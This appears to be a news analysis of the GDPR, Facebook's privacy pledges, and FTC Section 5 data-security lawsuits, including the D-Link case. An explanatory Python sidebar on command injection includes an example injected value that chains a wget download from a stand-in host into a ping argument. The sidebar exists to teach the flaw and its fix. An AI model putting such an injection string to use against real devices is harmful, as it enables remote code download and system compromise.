The GDPR was proposed by the European Commission in 2012 as an update to an existing EU data-privacy law, Data Protection Directive 95/46/EC, which had been on the books since 1995. The European Parliament passed its own version of the GDPR in 2014 with the Council of the European Union following suit in 2015, at which time the three bodies got together to hash out the final wording of the law. That process lasted until 2016. Now, after a two-year grace period, the GDPR will go into effect in May.
Once it does, it will provide an unprecedented level of privacy protection for EU citizens, whether they live in an EU member nation or abroad. It will effectively regulate the privacy practices of any company that processes the personal data of people residing within the EU, regardless of where the company itself -- or its cloud infrastructure -- is located. That is, companies will be held responsible for how they handle the personal data they collect from users. What's more, it grants people the "right to be forgotten" as well as the right to request both copies of their personal data and information about how and why their data is being processed.
Users will also enjoy data portability: the ability to move their personal data from one company to another. This rule carries an interesting secondary effect that Facebook might not like. Because people could move their data freely between services, portability lowers the barriers to entry for new, competing services and could weaken the lock-in effect that helps companies like Facebook and Google establish insurmountable market dominance.
The GDPR also significantly strengthens consent protections for EU residents and citizens. Companies will be prohibited from using "long illegible terms and conditions full of legalese, as the request for consent must be given in an intelligible and easily accessible form, with the purpose for data processing attached to that consent," according to the GDPR website. "It must be as easy to withdraw consent as it is to give it."
When questioned by Rep. Gene Green, a Texas Democrat, about how Facebook would implement this practice in the US, Zuckerberg asserted that the Facebook app will include a step-by-step tool that walks users through their settings, allowing them to adjust their privacy controls as they wish. Whether users will actually use the tool in appreciable numbers remains to be seen.
To ensure companies comply with these broad demands, the GDPR carries serious penalties for those who would ignore the law. Infractions carry a maximum fine of 4 percent of annual global turnover (that is, the company's annual revenue) or €20 million, whichever is greater. The penalties are tiered, mind you: minor infractions, such as failing to keep records in order or failing to properly notify authorities in the event of a data breach, carry a fine of up to 2 percent.
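The "whichever is greater" structure can be sketched in a few lines of Python. (The €10 million floor on the lower tier comes from the regulation itself; the article quotes only the percentages. The turnover figure in the example is illustrative.)

```python
def gdpr_max_fine(annual_turnover_eur: int, minor: bool = False) -> int:
    """Maximum GDPR fine: the greater of a percentage of annual global
    turnover or a fixed floor.

    Major infractions: 4% of turnover or EUR 20 million, whichever is greater.
    Minor infractions (e.g. sloppy record-keeping, late breach notification):
    2% of turnover, which the regulation pairs with a EUR 10 million floor.
    """
    if minor:
        return max(annual_turnover_eur * 2 // 100, 10_000_000)
    return max(annual_turnover_eur * 4 // 100, 20_000_000)

# For a company with EUR 34 billion in annual turnover, the percentage
# tier dwarfs the fixed floor:
print(gdpr_max_fine(34_000_000_000))         # 1360000000, i.e. EUR 1.36B
# For a small firm, the floor dominates:
print(gdpr_max_fine(1_000_000, minor=True))  # 10000000, i.e. EUR 10M
```

The `max()` is the whole point of the design: a percentage alone would let small companies shrug off fines, while a flat figure alone would be trivial for the giants.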
To its credit, Facebook has committed to applying the GDPR benchmarks, not just "controls and settings," across its entire global network. "Overall, I think regulations like this are very positive," Zuckerberg told reporters on a conference call in April. "We intend to make all the same controls available everywhere, not just in Europe."
"Is it going to be exactly the same format? Probably not," he continued. "We'll need to figure out what makes sense in different markets with different laws in different places. But let me repeat this: We're going to make all the same controls and settings available everywhere, not just in Europe." That said, there's no word yet on when Facebook would actually implement such changes.
From a technical standpoint, there's not much preventing Facebook from implementing these protections worldwide. The problem, it turns out, is political. As a Facebook representative explained to TechCrunch, the GDPR protections run contrary to data-collection laws in some countries, which means that they can't legally be rolled out everywhere. Still, the company remains committed to expanding the protections to as many users as it can.
While it's all well and good that Facebook is doing the right thing for once rather than moving fast and breaking stuff, there's no reason for governments not to implement their own data-protection legislation. In fact, some local governments are already planning privacy bills. San Francisco supervisor Aaron Peskin announced one such bill on Tuesday, which would prohibit the city from doing business with any company that does not adhere to "the highest standards for data protection." Details of the bill, which will go before voters in November, have not yet been released.
But even without national legislation, the US government already has a de facto data-protection-enforcement mechanism. It's called the Federal Trade Commission. The FTC has aggressively pursued a number of companies including Google and Uber over the past few years using Section 5 of the FTC Act, which prohibits unfair or deceptive trade practices. The FTC has successfully argued that companies that have suffered data breaches violated Section 5 because said breaches were the result of the companies' failure to adopt "reasonable" data-protection schemes.
A few companies, including Wyndham Hotels and LabMD, have fought this litigation rather than settling and issuing consent decrees. They argue, first, that there is no legal definition of what constitutes a "reasonable" data-protection scheme and, second, that no level of cybersecurity is high enough to defend against each and every hacking attempt.
In a 2017 lawsuit against D-Link, the FTC once again invoked Section 5, arguing that the company failed to take reasonable precautions to harden its products against known and foreseeable threats. The FTC's charges point out that D-Link left its private key -- which hackers could use to cajole machines into running malware -- on a public website for six months, and that the company's software suffered from a known "command injection" vulnerability.
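For readers unfamiliar with the term, a command injection flaw arises when user-supplied input is spliced into a shell command without sanitization. Here is a minimal, hypothetical Python sketch of the general pattern and its fix -- illustrating the class of flaw, not D-Link's actual firmware code:

```python
def build_ping_vulnerable(host: str) -> str:
    # Vulnerable pattern: the attacker-controlled value is interpolated
    # into a string later handed to a shell (e.g. via shell=True). Input
    # like "8.8.8.8; wget evil.example/payload" makes the shell execute
    # the attacker's command after the ping finishes.
    return f"ping -c 1 {host}"

def build_ping_safe(host: str) -> list[str]:
    # Safe pattern: arguments passed as a list go straight to the OS as
    # separate argv entries; no shell ever parses the metacharacters.
    return ["ping", "-c", "1", host]

malicious = "8.8.8.8; wget evil.example/payload"
# In the safe form, the entire malicious string stays one argument:
print(build_ping_safe(malicious)[-1] == malicious)  # True
```

In embedded devices such as routers, the vulnerable pattern typically shows up in web-admin pages that pass form fields to shell utilities, which is what makes the flaw both common and, as the FTC argues, reasonably preventable.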
However, the case gets a bit sticky because the FTC goes on to argue that D-Link's actions -- just like LabMD's -- may cause harm to its customers. D-Link has countered, arguing that the mere potential for harm is insufficient to bring litigation. According to D-Link's filing, "the FTC speculates that consumers were placed 'at risk' to be hacked but fails to allege, as it must, that actual consumers suffered or are likely to suffer actual substantial injuries."
Both the D-Link and LabMD lawsuits are ongoing but illustrate the need for a legislative solution to the issue of data privacy in America, rather than having the courts craft it one case at a time. However, given the partisan climate in Washington, passing a bill similar to the GDPR seems unlikely.